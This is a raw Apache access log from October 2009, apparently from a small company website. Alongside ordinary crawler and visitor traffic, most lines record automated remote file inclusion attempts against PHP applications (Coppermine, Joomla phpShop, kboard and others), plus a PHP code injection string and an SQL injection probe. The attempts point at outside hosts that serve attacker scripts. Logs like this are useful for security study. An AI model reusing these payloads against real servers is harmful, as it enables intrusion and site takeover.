218.27.203.107 - - [28/Oct/2009:06:17:12 -0400] "GET /logs/access_log.Q109051100%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:18 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:18 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:18 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:18 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:19 -0400] "GET /logs/access_log.Q109051100%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:19 -0400] "GET /logs/access_log.Q109051100%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:19 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:20 -0400] "GET /logs/access_log.Q109051100%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:20 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:34 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:36 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:17:36 -0400] "GET /logs/access_log.Q109051100%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:06:18:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.199.140.158 - - [28/Oct/2009:06:18:44 -0400] "GET //?_zb_path=http://www.segurosaldia.com/AK1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
122.199.140.158 - - [28/Oct/2009:06:18:52 -0400] "GET /logs/access_log.Q109093000//?_zb_path=http://www.segurosaldia.com/AK1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
122.199.140.158 - - [28/Oct/2009:06:19:00 -0400] "GET /logs//?_zb_path=http://www.segurosaldia.com/AK1.txt? HTTP/1.1" 200 23667 "-" "Mozilla/5.0"
217.199.218.29 - - [28/Oct/2009:06:19:08 -0400] "GET /logs/access_log.Q109100300//s_loadenv.inc.php?DOCUMENT_ROOT=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:24 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:24 -0400] "GET /logs/access_log.Q109051100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:24 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:27 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:27 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:27 -0400] "GET /logs/access_log.Q109051100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:06:19:28 -0400] "GET /logs/access_log.Q109082800/errors.php?error=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:06:19:28 -0400] "GET /logs/access_log.Q109081900/errors.php?error=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:31 -0400] "GET /logs/access_log.Q109051100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:31 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:31 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:34 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:34 -0400] "GET /logs/access_log.Q109051100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:34 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.249.65.200 - - [28/Oct/2009:06:19:36 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L019EFB501CE0B500C8A904M+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.27.203.107 - - [28/Oct/2009:06:19:39 -0400] "GET /logs/access_log.Q109051100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:40 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:40 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:44 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:44 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Oct/2009:06:19:45 -0400] "GET /logs/access_log.Q109051100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:20:09 -0400] "GET /logs/access_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:20:09 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:20:09 -0400] "GET /logs/access_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:20:09 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:20:12 -0400] "GET /logs/access_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.150.183.219 - - [28/Oct/2009:06:20:12 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.120.151.163 - - [28/Oct/2009:06:20:58 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2)"
124.120.151.163 - - [28/Oct/2009:06:20:58 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2)"
124.120.151.163 - - [28/Oct/2009:06:20:59 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2)"
124.120.151.163 - - [28/Oct/2009:06:21:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2)"
202.123.212.188 - - [28/Oct/2009:06:21:34 -0400] "GET /logs/access_log.Q109082800/errors.php?error=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.123.212.188 - - [28/Oct/2009:06:21:34 -0400] "GET /logs/access_log.Q109081900/errors.php?error=http://perphorma.com/brd/id1.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.193.15.3 - - [28/Oct/2009:06:22:48 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
82.193.15.3 - - [28/Oct/2009:06:22:51 -0400] "GET /logs/access_log.Q109100300//s_loadenv.inc.php?DOCUMENT_ROOT=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
123.125.66.124 - - [28/Oct/2009:06:23:06 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [28/Oct/2009:06:23:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.72.166.52 - - [28/Oct/2009:06:24:13 -0400] "GET /skin/zero_vote/login.php?dir=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
220.181.7.66 - - [28/Oct/2009:06:24:48 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
63.246.152.22 - - [28/Oct/2009:06:25:26 -0400] "GET ////?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
63.246.152.22 - - [28/Oct/2009:06:25:26 -0400] "GET /logs/access_log.Q109101000////?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
63.246.152.22 - - [28/Oct/2009:06:25:26 -0400] "GET /logs////?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 23669 "-" "Mozilla/5.0"
63.246.152.22 - - [28/Oct/2009:06:25:29 -0400] "GET /logs////?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 23669 "-" "Mozilla/5.0"
63.246.152.22 - - [28/Oct/2009:06:25:29 -0400] "GET /logs/access_log.Q109101000%20%20////?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
63.246.152.22 - - [28/Oct/2009:06:25:29 -0400] "GET ////?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
63.246.152.22 - - [28/Oct/2009:06:25:36 -0400] "GET ////?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
63.246.152.22 - - [28/Oct/2009:06:25:36 -0400] "GET /logs////?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 23669 "-" "Mozilla/5.0"
174.143.3.188 - - [28/Oct/2009:06:26:34 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
174.143.3.188 - - [28/Oct/2009:06:26:34 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
174.143.3.188 - - [28/Oct/2009:06:26:34 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
174.143.3.188 - - [28/Oct/2009:06:26:35 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
66.249.65.200 - - [28/Oct/2009:06:27:51 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L019EFB501D902500C2A904M+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Oct/2009:06:28:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.236.23.242 - - [28/Oct/2009:06:29:15 -0400] "GET /logs/port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:29:15 -0400] "GET /port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:29:17 -0400] "GET /port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:29:17 -0400] "GET /logs/port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:29:17 -0400] "GET /logs/access_log.Q109101500/port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:29:17 -0400] "GET /logs/access_log.Q109101500/port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
119.73.43.206 - - [28/Oct/2009:06:29:53 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
119.73.43.206 - - [28/Oct/2009:06:29:53 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.236.23.242 - - [28/Oct/2009:06:30:24 -0400] "GET /logs/port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:30:24 -0400] "GET /port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:30:24 -0400] "GET /logs/port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:30:24 -0400] "GET /port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:30:28 -0400] "GET /logs/access_log.Q109101500%20%20/port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:30:30 -0400] "GET /logs/access_log.Q109101500%20%20/port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.251.99.2 - - [28/Oct/2009:06:32:44 -0400] "GET /logs/access_log.Q109090700//shop.htm?cid=' HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
125.251.99.2 - - [28/Oct/2009:06:32:45 -0400] "GET //shop.htm?cid=' HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
125.251.99.2 - - [28/Oct/2009:06:32:45 -0400] "GET /logs//shop.htm?cid=' HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
209.59.12.99 - - [28/Oct/2009:06:33:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.65.200 - - [28/Oct/2009:06:35:12 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L41744E4A4FD920001899085+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.16.1.180 - - [28/Oct/2009:06:35:22 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:35:22 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:35:22 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
125.251.99.2 - - [28/Oct/2009:06:36:12 -0400] "GET /logs/access_log.Q109101000//shop.htm?cid=' HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
174.143.3.188 - - [28/Oct/2009:06:36:47 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
174.143.3.188 - - [28/Oct/2009:06:36:47 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
174.143.3.188 - - [28/Oct/2009:06:36:47 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
174.143.3.188 - - [28/Oct/2009:06:36:48 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
172.16.1.180 - - [28/Oct/2009:06:37:23 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:37:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:06:37:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.249.65.201 - - [28/Oct/2009:06:37:26 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.201 - - [28/Oct/2009:06:37:26 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3173FD494529D0000C6908L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Oct/2009:06:38:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
98.129.217.53 - - [28/Oct/2009:06:38:21 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:06:38:21 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:06:38:21 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:06:38:23 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:06:38:23 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:06:38:23 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:06:38:29 -0400] "GET /logs/access_log.Q109070500//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:06:38:34 -0400] "GET /logs/access_log.Q109070500//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:38:37 -0400] "GET /logs/access_log.Q109053000%20%20/port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:38:37 -0400] "GET /port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:38:37 -0400] "GET /logs/port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:38:42 -0400] "GET /logs/port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:38:42 -0400] "GET /port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
94.236.23.242 - - [28/Oct/2009:06:38:42 -0400] "GET /logs/access_log.Q109053000%20%20/port.php?content=http://koiled.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.55.105.240 - - [28/Oct/2009:06:39:17 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.240 - - [28/Oct/2009:06:39:17 -0400] "GET /logs/access_log.Q109072300 HTTP/1.1" 200 5083465 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
82.66.41.16 - - [28/Oct/2009:06:39:45 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
82.228.134.196 - - [28/Oct/2009:06:39:45 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
82.66.41.16 - - [28/Oct/2009:06:39:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
82.228.134.196 - - [28/Oct/2009:06:39:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
98.129.217.53 - - [28/Oct/2009:06:40:35 -0400] "GET /logs/access_log.Q109051600%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
